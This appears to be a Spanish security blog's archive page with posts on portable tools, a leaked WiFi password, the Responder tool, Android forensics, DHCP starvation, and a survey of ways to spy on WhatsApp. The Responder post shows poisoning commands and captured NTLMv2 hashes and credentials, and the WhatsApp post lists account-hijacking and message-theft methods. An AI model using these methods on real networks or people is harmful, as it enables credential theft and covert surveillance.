lunes, 30 de junio de 2014

10 aplicaciones que deberías llevar en tu USB


En EFYTimes se suelen publicar pequeños recopilatorios, muchos de ellos bastante interesantes como el que os traducimos a continuación. Se trata de 10 aplicaciones indispensables que todo buen informático debería llevar consigo en un pendrive USB. Echadle un vistazo y comentarnos si cambiaríais alguna del listado o si echáis en falta alguna más:

1.FreeOTFE Programa de cifrado de disco al vuelo (OTFE) de código abierto para PCs con Microsoft Windows que crea unidades virtuales o discos, mediante el cual se cifra automáticamente todo lo que se escribe a disco antes de ser almacenado.
 Programa de eliminación de adware y spyware. Escanea el disco y/o la memoria RAM en busca de software malicioso en el ordenador.

3.ClamWin Portable Antivirus ClamWin portable. ClamWin es un antivirus de código abierto para Microsoft Windows. Proporciona una interfaz gráfica de usuario al motor Clam AntiVirus.

Software de recuperación de datos para Windows que es capaz de recuperar archivos que han sido eliminados permanentemente y marcados por el sistema operativo como espacio libre. El programa también puede ser utilizado para recuperar archivos borrados de unidades flash USB, tarjetas de memoria o reproductores MP3.

5.VLC Media Player Portable

Reproductor VLC empaquetado para ser portable. Es un reproductor multimedia y servidor de streaming de medios libre y de código abierto, multiplataforma y que soporta varios métodos de compresión de audio y vídeo y formatos de archivo, incluyendo DVD-Video, CD de vídeo y protocolos de streaming.

6.GIMP Portable Editor de imágenes empaquetado como una aplicación portable. Es casi un estándar para el retoque y edición de imágenes, dibujo libre, cambio de tamaño, recorte, fotomontajes, convertir entre diferentes formatos de imagen y otras tareas más especializadas.

7.LibreOffice Paquete de código libre y abierto, que comprende aplicaciones para hacer procesamiento de textos, hojas de cálculo, presentaciones, diagramas y dibujos, mantener bases de datos y componer fórmulas matemáticas.

8.7-Zip Portable 7-Zip empaquetado como una aplicación portable. Utiliza el formato de archivo 7z, pero sabe leer y escribir otros formatos de compresión.

9.KeePass Classic Password Safe Portable Utilidad de gestión de contraseñas gratuita, de código abierto, multiplataforma y ligera. Funciona bajo Microsoft Windows pero tiene versiones no oficiales para Linux, Mac OS X, iOS, Android y Windows Phone.

10.Mozilla Firefox Navegador web libre y de código abierto desarrollado para Windows, OS X, y Linux, con una versión móvil para Android. Firefox utiliza el motor Gecko para renderizar páginas web, e implementa los estándares web actuales y previstos.

miércoles, 25 de junio de 2014

El Security Center del Mundial publica la clave de su WiFi

Lo de hacerse fotos y que en el fondo se vaya algo que no debería haberse visto es muy común. Hace poco se lío cuando Tim Cook - el chairman de Apple - se fue a visitar la fábrica en USA donde se montan los MacBook Pro, y en el fondo se veía que usaban Windows para hacerlos - eso sí, con mucho estilo corriendo en un iMac como los puntos de Internet que hay por ahí. -.

Figura 1: Lo que se ve es un Windows corriendo en un iMac
Yo mismo, cuando me pasan las capturas para poner en los artículos que publico por este blog que no son míos, reviso que no se escape nada que no deba verse. Reviso los títulos de las ventanas, los valores hexadecimales o los códigos en Base64 que puedan ser decodificados, etcétera, y aún así se me escapa alguno de vez en cuando.
Que esto le pase a Sara Carbonero con las passwords de la WiFi que iban a utilizar en el mundial de fútbol el equipo de reporteros, es gracioso y hasta enternecedor. Al fin y al cabo, en el mundo de la tecnología se puede permitir ser un poco más Penny que en el mundo del periodismo, donde ejerce su profesión de verdad.

Figura 2: Las redes WiFi y las passwords. Me encanta la de "iniestademivida"
Lo que ya es curioso es que al Centro de Seguridad encargado de velar por la seguridad del Mundial de Fútbol de Brasil, se le escape una foto con la contraseña bien gordo en el fondo. Vamos, supongo que ya la habrán cambiado, pero ellos seguro que deberían conocer los riegos de seguridad de que alguien con malas intenciones se pueda colar en tu red WiFi.

Figura 3: Posando con las banderitas, el SSID, la clave WiFi y algún correo por ahí
Esto, también le pasó tiempo atrás al Centro de Control de Seguridad la SuperBowl, que también publicó la clave WiFi que utilizaban, y que por supuesto fue hiper-retwitteado por todo el planeta.
Figura 4: Otro centro de control de seguridad que publicó la password de su WiFi

Si quieres tener problemas de seguridad con tu red WiFi, no hace falta hacer el ridículo poniendo una clave que luego se vea en una imagen en la que encima vas a posar, pon una red abierta que todo el mundo se configure y espera que lleguen los malos.
Figura 5: Las redes WiFi del Senado
Pero al final, tampoco hay que preocuparse tanto. Total, ¿qué podría alguien querer hacer con la red WiFi de cualquiera de estos sitios? Si eres de los que sí que te importa, os dejé un artículo sobre cómo securizar una red WiFi para que no te entren.

Fuente

martes, 10 de junio de 2014

Responder: despliega servidores falsos en la red para robar contraseñas - Kali Linux


Responder de SpiderLabs es una herramienta para la obtención pasiva de credenciales en la red.

Todo está escrito en Python pensando en la portabilidad, por lo que no será necesario instalar ninguna herramienta extra ni añadir ningún módulo adicional.

Lo ejecutas y escucha peticiones NBT-NS (NetBIOS Name Service), LLMNR (Link-local Multicast Name Resolution) y mDNS (multicast Domain Name System) y envenena al emisor. Cuando detecta una petición basada en el nombre del sufijo (ver: http://support.microsoft.com/kb/163409) solicitará y almacenará las credenciales de la víctima.

Responder además viene con varios servidores de autenticación falsos (HTTP/SMB/MSSQL/FTP/LDAP) que soportan NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP y autenticación HTTP básica.
Veámos un poco su facilidad de uso en una máquina virtual con Kali:

Instalación:


root@kali:~# git clone https://github.com/SpiderLabs/Responder.git

root@kali:~# cd Responder/
root@kali:~/Responder# ls
Certs                FixInternet.exe   LDAPPackets.py       Responder.py
CHANGELOG            HTTPCookies       odict.py             SMBPackets.py
Denied.html          HTTPPackets.py    RAPLANMANPackets.py  SMBRelay.py
DHCP.py              HTTPProxy.py      README.md            SMTPPackets.py
Fingerprint.py       Icmp-Redirect.py  RelayPackets.py      SQLPackets.py
FingerprintRelay.py  IMAPPackets.py    Responder.conf

Ejemplo de uso:


root@kali:~/Responder# python Responder.py -i 192.168.142.128 -I eth0 -d SMB -b 0 -r 1 -v
NBT Name Service/LLMNR Responder 2.0.
Please send bugs/comments to: lgaffie@trustwave.com
To kill this script hit CRTL-C

[+]NBT-NS, LLMNR & MDNS responder started
[+]Loading Responder.conf File..
Global Parameters set:
Responder is bound to this interface: eth0
Challenge set: 1122334455667788
WPAD Proxy Server: False
WPAD script loaded:  function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}
HTTP Server: ON
HTTPS Server: ON
SMB Server: ON
SMB LM support: False
Kerberos Server: ON
SQL Server: ON
FTP Server: ON
IMAP Server: ON
POP3 Server: ON
SMTP Server: ON
DNS Server: ON
LDAP Server: ON
FingerPrint hosts: False
Serving Executable via HTTP&WPAD: OFF
Always Serving a Specific File via HTTP&WPAD: OFF

Captura de hash SMB-NTLMv2:


LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]WPAD (no auth) file sent to: 192.168.142.1

LLMNR poisoned answer sent to this IP: 192.168.142.1. The requested name was : servidor1.
[+]SMB-NTLMv2 hash captured from :  192.168.142.1
[+]SMB complete hash is : prueba::DOMINIO:1122334455667788:1D863E3C5746398740BBD893B1F7B43B:01010000000000684CF017068466D9E239FD90000002000A0073006D006200310032000100140053004500520056004500520032003000300038000400160073006D006200310032002E006C006F00630061006C0003002C0053004500520056004500520032003000300038002E0073006D006200310032002E0061006C000500160C006F00630061006C000073006D006200310032002E00680030003000000000000000010000000020009E00000C5EC24000A0F2F627F8D95AAB1740E16A2D24BE1C9B0E222697E60D026DBF5C5C006C006F00634C3451030A001000000000000000000000000000000000000900120063006900660073002F006500760061006E000000000000000000

Captura de credenciales FTP:


[[+]FTP User:  test
[+]FTP Password is:  test

Captura de credenciales HTTP/HTTPS:


[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test
[+]HTTP GET request from : 192.168.142.1. The HTTP URL requested was: /favicon.ico
[+]HTTP-User & Password: test:test

[+]HTTPS-User & Password: test:test

Captura LDAP:


[LDAP]Clear Text User & Password is: :

Repositorio en Github: https://github.com/Spiderlabs/Responder


Fuente

lunes, 9 de junio de 2014

Analiza las bases de datos SQLite de tu smartphone Android con ADEL (Android Data Extractor Lite)

ADEL (Android Data Extractor Lite) es un script en Python que vuelca todas las bases de datos SQLite de un smartphone Android a disco y analiza los archivos en un workflow forense. 



Si el smartphone no está conectado se puede especificar un directorio que contenga las bases de datos a analizar. Después, el script creará un informe XML claramente estructurado. Si conectas el smartphone necesitarás que esté rooteado y un kernel inseguro o un recovery personalizado.

Ejemplo de uso de ADEL con un smartphone conectado:

adel.py -d device -l 4

Ejemplo de uso de ADEL con copias de seguridad de bases de datos:

adel.py -d /home/user/backup -l 4 

ADEL necesita una configuración predefinida para que cada dispositivo funcione correctamente. Esta configuración se debe añadir en el siguiente archivo:

xml/phone_configs.xml

Como ejemplo han añadido la configuración para el Samsung Galaxy S2 con Android 2.3.3. Más adelante seguirán añadiendo más configuraciones telefónicas.
En el estado actual de desarrollo, las bases de datos que se tratan y analizan son:

- información telefónica y de la tarjeta SIM (por ejemplo, IMSI y el número de serie)

- directorio telefónico y las listas de llamadas- entradas del calendario- mensajes SMS- localizaciones GPS de diferentes fuentes en el smartphone

ADEL ahora usa una imagen de recuperación personalizada basada en el ClockworkMod-Recovery. 
Gracias a esto ya no es necesario modificar el kernel o el demonio adb. Por otra parte, en algunos smartphones más nuevos se puede cargar la recuperación modificada en la RAM mediante fastboot, por lo que no será necesario hacer cualquier cambio que persista en el smartphone.

Repositorio GitHub del proyecto: https://github.com/mspreitz/ADEL

Fuente

Inanición de redes con DHCP (DHCP Starvation) mediante DHCPig


En un ataque de agotamiento DHCP (DHCP Starvation) un usuario malicioso inunda con peticiones DHCP el servidor utilizando diferentes direcciones MAC. Con esto puede llegar a agotar por completo el espacio de direcciones asignables por los servidores DHCP por un período indefinido de tiempo. Los clientes de la red de la víctima entonces no obtendrán automáticamente una IP para acceder a la red por lo que este ataque podría ser clasificado como una denegación de servicio.

Este tipo de ataque se puede lograr fácilmente con herramientas como Gobbler, Yersinia, Metasploit o, como se muestra en el siguiente vídeo, mediante DHCPig, un script en Python que utiliza Scapy y que es capaz de consumir todas las IPs disponibles en la LAN, liberar cualquier IP en uso en la red y mandar ARPs para que los sistemas Windows permanezcan offline:

  

viernes, 6 de junio de 2014

Cómo espiar WhatsApp

Estas son algunas de las técnicas que existen para espiar WhatsApp, aunque este tiempo atrás la noticia fue que se ha detenido el creador de WhatsApp Spy, una aplicación falsa que estafaba a usuarios con la esperanza de poder obtener las conversaciones de otras personas. La pregunta que mucha gente se hace es si es posible espiar las conversaciones de WhatsApp, así que viendo el gran interés del mundo en la seguridad en WhatsApp, he decidido escribir este recopilatorio con todas las posibilidades que existen para esta tarea para que toméis vuestras precauciones al respecto, aunque no olvidéis que si hay un iPhone de por medio, mejor que os leáis el libro de Hacking iOS: iPhone & iPad, donde se cuentan muchas formas de hackear el terminal que darían acceso al WhatsApp. Vamos a ello:

Espiar WhatsApp sabiendo el número de teléfono de una persona

Actualmente, si se conoce el número de teléfono de la cuenta asociada a WhatsAppse puede sacar información del dueño, e incluso la fotografía pública asociada, pero no hay ningún servicio que permita llegar a las conversaciones. Esta era la estafa.


Figura 1: What's App on PC es un malware

También debes huir de programas mágicos que te bajas a tu PC o a Android te permitirá configurar cualquier número de teléfono en él. Esto, por desgracia, suele ser malware. En un estudio hecho por Eleven Paths, en sólo un mes fue posible encontrar muchas apps maliciosas de WhatsApp en Google Play.



Figura 2: Consulta de información pública de WhatsApp agregando a contactos


La gente de WhatsApp Voyeur quitó el servicio de consulta de información asociado al número de teléfono, pero puede hacerse manualmente simplemente agregando el número de teléfono a los contactos. Por otro lado, solo con agregar un contacto también se puede saber cuándo está conectado o no, salvo que se hayan aplicadotips de privacidad en WhatsApp.

Gracias a un nueva función de previsualización de imágenes de URLs enviadas por mensaje de chat en WhatsApp para Android, una persona podría enviar una URL de una página web controlada, y forzar al cliente a realizar una conexión de datos a ese servidor web, por lo que se podría averiguar la dirección IP y por tanto la ubicación de esa persona, además de la versión exacta del sistema operativo que tiene.

Espiar WhatsApp robando las conversaciones por la red WiFi

Antes sí se podía descifrar la comunicación entre los servidores de WhatsApp y los dispositivos móviles. WhatsApp pasó a utilizar SSL a partir de la versión 2.8.3, por lo que ya no utiliza los antiguos trucos basados en la MAC o el IMEI - fácilmente consultable -. Si la versión fuera antigua, aún servirían herramientas comoWhatsAppSniffer y todas las variantes que aparecieron. Para hacerlo desde capturas de tráfico de red, existía para las versiones antiguas un plugin llamado Wireshark-Whatsapp.


Figura 3: WhatsAppSniffer para Android


El 8 de Octubre de este año se ha publicado un nuevo método con una Prueba de concepto para descifrar las comunicaciones de WhatsApp por red, pero aún no hay ninguna herramienta que lo haga con las comunicaciones de la aplicación oficial, pero si se graban las conversaciones con un sniffer tipo WireShark, probablemente en el futuro se puedan descifrar todas. No obstante, piensa en serio poner unaconexión VPN para proteger tus conversaciones de WhatsApp.

Averiguar el número de teléfono de WhatsApp una persona por la WiFi

En las comunicaciones de WhatsApp se envía un paquete de tipo WA en el que se especifica el número de teléfono, la versión del sistema operativo y más información que va sin cifrar. Capturando el tráfico de red con WireShark se puede usarWhatsApp Discover para localizar los números de teléfono que están siendo utilizados por la red WiFi.



Figura 4: Paquete de red con el número de teléfono de WhatsApp


Espiar WhatsApp robando la cuenta remotamente

Para conseguir esto habría que encontrar una vulnerabilidad en WhatsApp que permitiera registrar el número de teléfono de la víctima en otro terminal y descargar las conversaciones que estén almacenadas en el servidor. Estos fallos de hijacking de WhatsApp han existido en el pasado, pero actualmente no hay ninguno que lo permita en remoto que sea conocido.


Figura 5: Ejemplo de Hijacking de WhatsApp publicado en 2011 por Yago Jesús



Tal vez aparezcan en el futuro o alguien tenga algún 0day no publicado al respecto, pero no se conoce ninguno que funcione ya que debido a la importancia que tienen,WhatsApp cierra estos fallos lo más rápido que puede.

Otra opción es que se pueda clonar la SIM de la persona que tiene instalado elWhatsApp para robar la cuenta de la víctima o que se intercepten las peticiones de alta y el mensaje SMS sniffando el tráfico GSM.

Espiar WhatsApp robando la cuenta de Apple ID

En la última versión la base de datos de conversaciones de WhatsApp puedeguardarse en Apple iCloud. Si te roban la cuenta de Apple ID - con un keylogger o mirando por encima del hombro -- podrían llegar a la base de datos y ver las conversaciones accediendo al backup de iCloud con herramientas como ElcomSoft Phone Password Breaker.

Espiar WhatsApp con robo de cuenta con acceso físico al teléfono

Si se tiene el teléfono cerca y tiene la previsualización de mensajes SMS activada, se podría instalar un WhatsApp en un tablet y pedir el SMS de confirmación para robar la cuenta y descargar las conversaciones anteriores. Este es el mismo caso querobar la cuenta de Hotmail/Gmail con un iPhone y la previsualización de SMS.

Espiar WhatsApp robando la base de datos de un backup de Apple

Cuando se hace un backup de un iPhone por medio de Apple iTunes a un equipo, la base de datos de WhatsApp se va también. Se puede localizar este fichero y analizar. Este proceso se explica en detalle en el libro de Hacking iOS: iPhone & iPad.


Figura 6: Copia de la base de datos de WhatsApp en el backup de Apple iTunes


Es un fichero SQLite, así que con cualquier visor de este formato de base de datos se puede ver. Hay que tener presente que si se han borrado mensajes, en la base de datos obtenida no se podrán ver. Sin embargo, es posible hacer un análisis forense de SQLite con Recover Messages y obtener muchos de los mensajes de WhatsApp que han sido borrados por el dueño.

Espiar WhatsApp robando la base de datos de la SD Card de un terminal Android

Si el terminal es Android, se puede obtener la base de datos de WhatsApp de la SDCard. Esta base de datos tiene un cifrado muy sencillo de quitar para obtener después el fichero SQLite en plano. Si se sube la base de datos cifrada a Recover Messages, se obtiene la base de datos descifrada automáticamente de forma gratuita. En los últimos resultados, ya hay más de 800.000 bases de datos analizadas con Recover Messages, y más de 25.500 usuarios registrados.


Figura 7: Opciones de cifrado de bases de datos. En Android ha cambiado en las últimas versiones


Ha habido cambios en el cifrado de las últimas versiones de WhatsApp para Androidy es necesario contar no solo con la base de datos msgstore.db.crypt sino que además se necesita la cuenta de correo electrónico del terminal para poder descifrar ese fichero.

Espiar WhatsApp robando la base de datos de un terminal iPhone

Tanto si se tiene el passcode del terminal iPhone, como si se tiene acceso a un equipo con el que se haya hecho el pareado de Apple iTunes/iPhone, es posible utilizar una herramienta tan sencilla como iFunBox y acceder al fichero de la base de datos de WhatsApp en el terminal iPhone sin hacer jailbreak, ni nada.


Figura 8: Accediendo a la base de datos de WhatsApp de un iPhone con iFunBox


Por supuesto, si el terminal tiene jailbreak, y no se han cambiado las contraseñas por defecto se podría acceder al terminal de muchas otras formas, incluyendoOpenSSH o haciendo uso de Gecko. En el libro de Hacking iOS: iPhone y iPad tienes muchas formas de acceder a los terminales iPhone saltándose u obteniendo el passcode.

Espiar WhatsApp instalando troyanos en los terminales

Si tienes acceso al terminal iPhone o Android existen muchas formas de instalar un troyano. En el caso de iPhone yo recopilé en este artículo las formas de instalar un troyano en iPhone. En Android las formas son otras, pero visto la cantidad demalware que hay y los últimos fallos de seguridad que se saltan las validaciones de las firmas no es de lo más difícil.


Figura 9: Espiar WhatsApp está entre las características de muchos troyanos


Espiar WhatsApp remotamente con una app maliciosa en Android e iPhone

En noviembre de 2013 se publicó el servicio WhatsAppCopy, un servicio basado en instalar una app maliciosa que pretendía ser un juego en terminales Android. Estaapp se dedicaba a robar las bases de datos de WhatsApp de todas las víctimas y ponía en un servicio de pago el acceso a los mensajes de terminales. Fue eliminada de Google Play  pero cualquier app que tenga el permiso deREAD_EXTERNAL_STORAGE puede acceder a ella y subirla a una web.



Figura 10: Código de app maliciosa Android para robar WhatsApp


El código para hacer este tipo de apps maliciosas para Android está disponible enCómo Espiar WhatsApp en Android, y ejemplos de cómo hacerlo en iPhone están en el libro de Hacking iOS. Son técnicas muy conocidas para los desarrolladores de apps para móviles.

En el caso de Android, existe la posibilidad de utilizar un APK creado con Metasploitque directamente ejecute Meterpreter en el terminal y te permita robar la base de datos. En este artículo se explica en detalle cómo robar la base de datos de WhatsApp de Android con Metasploit.
Espiar WhatsApp en iPhone sin troyano

En el caso de iPhone aunque no es su propósito original, se puede utilizar la herramienta WhatsApp Anti-Delete Protectiton Tool. Esta herramienta puede utilizarse para proteger tus mensajes, pero también podría ser usada como método de control parental de jóvenes o para espiar los mensajes de una persona. Se necesita en cualquier caso acceso físico al terminal. En el siguiente vídeo podéis ver su funcionamiento en detalle.



Figura 11: Funcionamiento de WhatsApp Anti-Delete Protection Tool
Espiar WhastApp con "tranquilidad"

No te olvides que muchas veces la forma más sencilla es que o no haya passcode, que sea un passcode que se haya adivinado o conocido o que aparezca un bug para saltarse el passcode así que, bastaría con acceder a los mensajes tranquilamente. Explicación común en muchos casos.

Conseguir bases de datos de WhtatsApp de la red

Como curiosidad, por descuido mucha gente puede dejar las bases de datos deWhatsApp compartidas en la red, ya sea en redes P2P como se ve en este artículo o en servidores de archivos de cualquier índole. El nombre de la base de datos deWhtasApp en un backup de Apple iTunes es1b6b187a1b60b9ae8b720c79e2c67f472bab09c0.



Figura 12: Copias de conversaciones de WhatsApp en e-mule

Como podéis ver, a pesar de que el tipo ha sido detenido por cometer una estafa, existen ciertas formas -  aunque no tan mágicas como las que prometía - por las que se puede conseguir leer los mensajes enviados y recibidos por WhatsApp, así que hay que tomar medidas de precaución para que esto no te pase.

miércoles, 4 de junio de 2014

Latch para Ubuntu y Latch para Open-Xchange disponibles

La semana pasada, durante la última actualización de la web de Latch, se publicaron nuevos plugins para integrar fácilmente Latch dentro de distintas plataformas. En esta ocasión se ha puesto disponible Latch para Ubuntu y Latch para Open X-Change.

Figura 1: Montaje publicado en Twitter sobre víctimas sin Latch en el juego WathcDogs


En el caso de Latch para Open-XChange se ha testeado con la versión de Open-XChange 7.4.2 y los pre-requisitos y el proceso de instalación lo tenéis detallado en la guía de ayuda de instalación. Para el uso de Latch para Ubuntu, una vez instalado el plugin como se detalla en la guía de instalación, basta con utilizar el comando pairSYS Temporary_Token o bien usar un sencillo GUI que se ha creado para realizar la tarea.

Figura 2: Latch para Ubuntu, guía de instalación y uso

Además de estos nuevos plugins, el plugin de Latch para WordPress ya lo tenéis publicado en el repositorio oficial de WordPress, desde donde podéis descargarlo también.

Figura 3: Plugin de Latch en el repositorio oficial de WordPress

En breve publicaremos las nuevas guías de Latch para los nuevos plugins, que pondremos junto al resto de tutoriales de instalación en el canal SlideShare de Eleven Paths con las que ya están disponibles:
- Latch para WordPress
- Latch para PrestaShop
- Latch para Joomla!
- Latch para Drupal 7
- Latch para Drupal 6
- Latch en Aplicaciones .NET
También, tienes para usar los siguientes plugins y herramientas:
- Latch para DotNetNuke
- Latch para RedMine
- Latch para OpenVPN
- Latch para SquirrelMail
- Latch para OpenSSH
- Latch Event Monitor
Y los siguientes SDKs para que integres cualquier aplicación con Latch:
- Latch SDK para Java
- Latch SDK para .NET
- Latch SDK para PHP
- Latch SDK para Ruby
- Latch SDK para Python
- Latch SDK para C
- Latch SDK para PowerShell
Recuerda que si quieres comenzar a utilizar Latch en tu vida, tienes este pequeño artículo que te explica cómo empezar a utilizar Latch para proteger tus identidades digitales desde ya.